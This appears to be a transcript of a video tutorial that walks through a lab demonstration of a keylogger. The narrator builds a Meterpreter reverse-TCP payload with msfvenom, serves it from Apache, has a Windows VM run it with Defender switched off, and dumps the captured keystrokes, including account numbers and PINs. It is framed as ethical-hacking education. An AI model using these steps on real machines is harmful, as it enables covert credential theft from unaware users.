Hello everyone, welcome to this channel, DGCL Digital Cloud Academy. So in today's video, we're diving into the world of cybersecurity. Alright, so we're going to explore one of the most common and dangerous threats out there, and that is the keylogger. Alright, so but before we go any further, I would want to make a disclaimer that this video is strictly for educational purpose, alright, educational and ethical hacking purpose. Okay, so understanding how keylogger works helps us defend against them, alright, and not to abuse them. So I'll walk you through a simple demonstration in a controlled environment, my Kali. Alright, so I'm going to be using Kali and the Windows test machine. This is the Windows machine and this is my Kali. Alright, so everything we're going to be performing is going to be on this Windows machine and on the Kali. Alright, not on a real live environment. So if you're practicing this, ensure you're using your VM, your VirtualBox or your VMware workstation, and your Kali installed, and your Windows 10 machine. You can use Windows 10, you can use Windows 8, or whichever. Alright, so without further ado, let's get started. Okay, so the first thing we need to do here is to open up our terminal. So I'm just going to click here to open up my terminal, and I'm going to check my Kali IP address. Alright, so the command to do that is ifconfig. Yeah, so this is my IP address. Okay, so if you type yours, you're going to see your own IP address appear this way. So I'm just going to copy this IP address and make sure I don't forget. 192.168.43.225. Alright, so the next step, since I know my IP address, the next thing to do is to create our payload. Alright, so we have to create our payload. So I'm going to clear up my terminal by typing clear. So to create my payload, I'm going to type some command. Just type along and I'm going to explain them. So the first is MSF Venom. But before then, I'm going to change my permission to a sudo permission. Alright, to sudo privilege. So to do that, I'm going to use sudo su. So sudo su gives me the root user. Alright, so I have the highest privilege to perform whichever tasks I need to perform. So I'm going to clear up my terminal. I like keeping it clean. So the first line of code to create our payload is the MSF Venom -p Windows /x 64 bits /meterpreter reverse _ TCP. So listening host L host, you put your equal sign, okay, then your Kali IP address. So I'm going to paste in my Kali IP address here, then -f exe -o keylog.exe. So this is the command to create our payload. Alright, if you type this, then here that says Windows means we are putting it on the Windows machine, 64 bits Windows machine. The meterpreter reverse TCP, this is the payload to create our keylogger. The listening host, this is the IP on which it will be listening on, which is our Kali IP. Then the -f means the file. Alright, to create this keylogger as a file. Then this is the file extension, which is .exe. Yeah, so our keylogger has been created successfully. You can see save as keylog.exe on this directory. Okay, so we can see the payload size 510 bytes. Okay, so you can see the final size. Alright, so to see this, you can type in ls. ls means to list your files, all the directories, the folders on your home page on this directory. So it's going to list them out here. So we have the keylog here. You can see the keylog. We have the keylog here. This is the one we created. So now the next thing we're going to do is to copy this keylog. This is our keylogger file into our Windows machine and execute it on our Windows machine. So we see how it works. Okay, so to create a folder, this is the command mkdir, and I'm going to name this folder keylogger file, and then the folder has been created. And so if I do ls, this is the folder. Okay, this is the folder here, this is the directory. So I'm going to copy, let me clear up my terminal by typing clear. Then I'm going to copy our keylogger file into our newly created folder. Remember, if I do ls, okay, this is our keylogger that we created. Then this is the directory keylogger file, where we will copy the file into this folder. Okay, so to copy that, I'm going to type in cp /arrow/ the name of the file we are copying, which is keylog.exe. You're copying it to the folder, and the folder name is keylogger file. So this is the name of the folder. Alright, so I'm going to hit enter. Yes, so this file has been copied to this folder. And how do we know? Let's go into this folder. To go into this folder, we'll use this command cd keylogger file. Okay, and enter. So if I click enter, then I'm on this folder. You can see I'm on this directory. To see what's on this directory, I have to use the ls command, then enter. So if I use ls command, this is our keylogger inside of our directory. And so we are going to copy this directory to a path, an Apache path, where we'll be able to access it on our Windows machine. Alright, so I'm going to clear up my terminal right now. So to copy this folder, I'm going to do cp -arrow, then the name of the folder, which is keylogger file. Okay, then I'm going to space it and type in var space www space html. So this is an Apache directory, Apache path, that I'm going to copy this folder. If I copy this folder into this path, I can easily access it from my Windows machine. Another way to access this keylogger, this folder, is if you create a shared folder on your Kali with your Windows machine. So you just copy the folder into the share folder. So but here on this video, I'm going to just copy this folder into this Apache path and then access it on my Windows machine. Remember, this folder contains our keylogger file. Okay, so I'm going to hit enter. cp. So to copy this folder into the Apache path, I will have to do a cd back. Let me go back to the Kali directory. Alright, so from the Kali directory, I can now type in my copy command, which is cp arrow keylogger. So if I access this part on my browser, I should be able to access this folder and the content of this folder. So the next thing for me to do is to switch on my Apache service from my Kali. So to do that, I'm going to open a new tab here. Okay, so on this new tab, I'm going to start up my Apache service. So I'm going to type in sudo systemctl start Apache 2. Enter your Kali password, and then your Apache is, so we now have to, since we've started the service, we now have to enable same service. So sudo systemctl enable Apache 2. Okay, so this is enabled. All right, this is enabled. So how do we know it's enabled? Let's see the status. Okay, so I'm going to type in sudo systemctl status apache 2. Yes, so you can see that this is running. All right, our service is enabled. You can see. Okay, so this is active and is running. You can see it here. So we now have to access our Windows machine with our Kali IP and this part. So just type along. I'm going to power on my Windows 10 machine so we access these parts. Okay, so head over to my Windows machine, power on this machine. Okay, so my Windows machine is opened. Yeah, so this is my Windows machine and I'm going to open up my browser here. Okay, so our browser is open. To access the Apache file, type in our IP Kali IP address on this browser and / the folder we created on Kali. Yes, so you can see we are able to access our keylogger file that we created in our Kali. All right, that we sent to that part, the Apache part. So this is the keylogger that we copied to our folder. Okay, so before you download this, ensure that your antivirus, your Windows Defender, they are all turned off. So I'm going to click on the keylogger to download. So this is it. Keylogger isn't common before you open. Okay, so this is like a security warning. Okay, so I'm going to click on keep. Okay, make sure you trust keylogger. Yeah, so yes, so this is the file that we just downloaded. So this is here, and let's go back to our Kali and set up our metasploit that we'll use to capture the keystrokes after installing this keylogger. So head back to your Kali. Okay, so I'm going to clear this terminal up. We are typing from the studio terminal. Okay, so I'm going to type in msf console. All right, this is where we'll capture the keystrokes from the user on the other machine. This is a tool. This is a full tool in Kali that you can use for your exploits, your pen test. This is a full tool. You can read more about Metasploit on this documentation link. So our Metasploit is open. I'm just going to clear up this so I have full terminal clear. So I'm in my Metasploit directory. Okay, so once you clear up your Metasploit terminal, type in this command: use exploits /multi /handler. So this is the payload using configured payload. So this is the payload we are using for this attack. All right, and so the next thing here is to set a payload. So click on set payload, Windows /x64 meterpreter. This is a command to set a payload. Alright, so I'm going to click enter key in my keypad. So our payload is set up properly. The next command here is to set our listening hosts. Alright, which is our Kali IP. So you type in set lhosts. Lhost is your Kali IP. Remember, this is our Kali IP 192.168.43.225. So your own Kali IP might be different from, it is different from what I have here. So on your own terminal, you type in your own Kali IP address Alright, so click on enter. So we've set our host. To see what we've set so far, click on type in show options. So when you type in show options, you have, this is our L host, remember, that we just set. Then this is the default ports for this purpose, 444. That's the listening ports. And then yeah, this is the payload that we set previously. Okay. The next command is now to exploit. So type in exploits and hit your enter key. Go over to your Windows machine. Just leave it the way it is. Go over to your Windows machine and then okay, so this is the keylogger file. So you right click on it and click on run as administrator. This will run at the background without anyone knowing. Okay, so we'll prompt this yes. So this is automatically running on the background of this Windows machine. Whatever we type here will be captured on our Kali. Alright, so let me go over to our Kali and let's see the prompts. You can see it's now saying started reverse TCP handler on this IP. So we'll now have to type in key scan. Alright, so when we click on enter, it's now starting keystroke sniffer. So when I go over to my Windows machine, let me try to type in something. I'm going to click on documents. So I'm just going to right click here. Let me open a new document, then try to type in something. So text documents, and let's say this is confidential. I'm naming this as confidential. Alright, so let me open this document and I'm going to say, let me just try to input a random information. So I'm going to say this document is highly confidential, account number 00555. Access code, let's say this is an important information of a customer. Alright, so this is confidential, thanks. And then we have this file saved on our system. So when I go over to my Kali, see what the user on the Windows machine actually typed. So we'll do key scan underscore dump. Alright, so when we press enter key on our keypad, we'll see every information that was written down there on the Windows machine. So I'm going to click on enter. So yeah, so this is completed. You can see dumping captured keystrokes. So this is shift key, shift key, shift key. This is for space. Then you can see that heading confidential. You see accounts number. This is the account number that was there on this Windows machine. Okay. Wow, so you can see the pin. This is the pin of the user. You can see the access code, and this is the number. You see, so somebody can use this for malicious purpose. So you see this right up, this is confidential, and the thanks. So everything that was written down here on this Windows machine, the user has no idea that these keystrokes has been captured. The user keystrokes has been captured on our Kali machine. Alright, so remember, this is for educational purpose. If you do this outside educational purpose, if you do this outside legal authority, you might be prosecuted for that. Alright, so always use this on your test environment, just like we just did on our Windows 10 machine and on our Kali.